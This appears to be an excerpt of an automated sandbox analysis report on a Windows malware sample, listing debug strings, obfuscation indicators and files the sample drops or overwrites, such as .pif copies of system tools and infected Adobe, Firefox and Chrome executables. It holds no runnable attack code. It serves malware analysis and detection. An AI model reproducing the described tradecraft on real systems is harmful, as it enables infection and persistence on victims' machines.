                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdbAAAGCTL source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B0E000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002AB4000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021ADF000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: pingsender.pdb source: alg.exe, 00000011.00000003.2573538319.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: private_browsing.pdb source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1420748141.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1440012872.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
                    Source: Binary string: easinvoker.pdbH source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mavinject32.pdb source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: 64BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2230247874.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000011.00000003.2208687784.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdbP source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: private_browsing.pdbp source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdb source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: alg.exe, 00000011.00000003.2708273963.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: updater.pdb source: alg.exe, 00000011.00000003.2628176522.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: Yara matchFile source: 0.2.C6dAUcOA6M.exe.2cf0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: aymtmquJ.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02D0894C
                    Source: C6dAUcOA6M.exeStatic PE information: real checksum: 0x0 should be: 0x138d20
                    Source: armsvc.exe.11.drStatic PE information: real checksum: 0x32318 should be: 0x13fe9a
                    Source: Juqmtmya.PIF.8.drStatic PE information: real checksum: 0x0 should be: 0x138d20
                    Source: Trading_AIBot.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x16b30
                    Source: elevation_service.exe0.13.drStatic PE information: real checksum: 0x1bb29d should be: 0x24d76e
                    Source: aymtmquJ.pif.0.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                    Source: alpha.pif.5.drStatic PE information: section name: .didat
                    Source: armsvc.exe.11.drStatic PE information: section name: .didat
                    Source: alg.exe.13.drStatic PE information: section name: .didat
                    Source: FXSSVC.exe.13.drStatic PE information: section name: .didat
                    Source: elevation_service.exe.13.drStatic PE information: section name: .00cfg
                    Source: elevation_service.exe.13.drStatic PE information: section name: .gxfg
                    Source: elevation_service.exe.13.drStatic PE information: section name: .retplne
                    Source: elevation_service.exe.13.drStatic PE information: section name: _RDATA
                    Source: elevation_service.exe.13.drStatic PE information: section name: malloc_h
                    Source: elevation_service.exe0.13.drStatic PE information: section name: .00cfg
                    Source: elevation_service.exe0.13.drStatic PE information: section name: .gxfg
                    Source: elevation_service.exe0.13.drStatic PE information: section name: .retplne
                    Source: elevation_service.exe0.13.drStatic PE information: section name: _RDATA
                    Source: elevation_service.exe0.13.drStatic PE information: section name: malloc_h
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1D2FC push 02D1D367h; ret 0_2_02D1D35F
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF63AE push 02CF640Bh; ret 0_2_02CF6403
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF63B0 push 02CF640Bh; ret 0_2_02CF6403
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFC349 push 8B02CFC1h; ret 0_2_02CFC34E
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1C378 push 02D1C56Eh; ret 0_2_02D1C566
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF332C push eax; ret 0_2_02CF3368
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1D0AC push 02D1D125h; ret 0_2_02D1D11D
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0306B push 02D030B9h; ret 0_2_02D030B1
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0306C push 02D030B9h; ret 0_2_02D030B1
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1D1F8 push 02D1D288h; ret 0_2_02D1D280
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1D144 push 02D1D1ECh; ret 0_2_02D1D1E4
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D03107 push 02D030B9h; ret 0_2_02D030B1
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0F108 push ecx; mov dword ptr [esp], edx0_2_02D0F10D
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF6784 push 02CF67C6h; ret 0_2_02CF67BE
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF6782 push 02CF67C6h; ret 0_2_02CF67BE
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF9748 pushfd ; iretd 0_2_02CF9757
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF9758 pushfd ; iretd 0_2_02CF975F
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF9760 pushfd ; iretd 0_2_02CF9763
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFD5A0 push 02CFD5CCh; ret 0_2_02CFD5C4
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D1C570 push 02D1C56Eh; ret 0_2_02D1C566
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFC56C push ecx; mov dword ptr [esp], edx0_2_02CFC571
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D08AD8 push 02D08B10h; ret 0_2_02D08B08
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0AAE0 push 02D0AB18h; ret 0_2_02D0AB10
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFCA4E push 02CFCD72h; ret 0_2_02CFCD6A
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFCBEC push 02CFCD72h; ret 0_2_02CFCD6A
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D64850 push eax; ret 0_2_02D64920
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0886C push 02D088AEh; ret 0_2_02D088A6
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D06946 push 02D069F3h; ret 0_2_02D069EB
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D06948 push 02D069F3h; ret 0_2_02D069EB
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0790C push 02D07989h; ret 0_2_02D07981
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D05E7C push ecx; mov dword ptr [esp], edx0_2_02D05E7E
                    Source: AppVClient.exe.13.dr | Static PE information: section name: .reloc entropy: 7.936521710837491
                    Source: FXSSVC.exe.13.dr | Static PE information: section name: .reloc entropy: 7.9422741099942105
                    Source: elevation_service.exe.13.dr | Static PE information: section name: .reloc entropy: 7.943951723334859
                    Source: elevation_service.exe0.13.dr | Static PE information: section name: .reloc entropy: 7.945960471485194
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                    Source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\alg.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\605af54964cdb3b4.bin
                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | File created: C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\Libraries\Juqmtmya.PIF
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
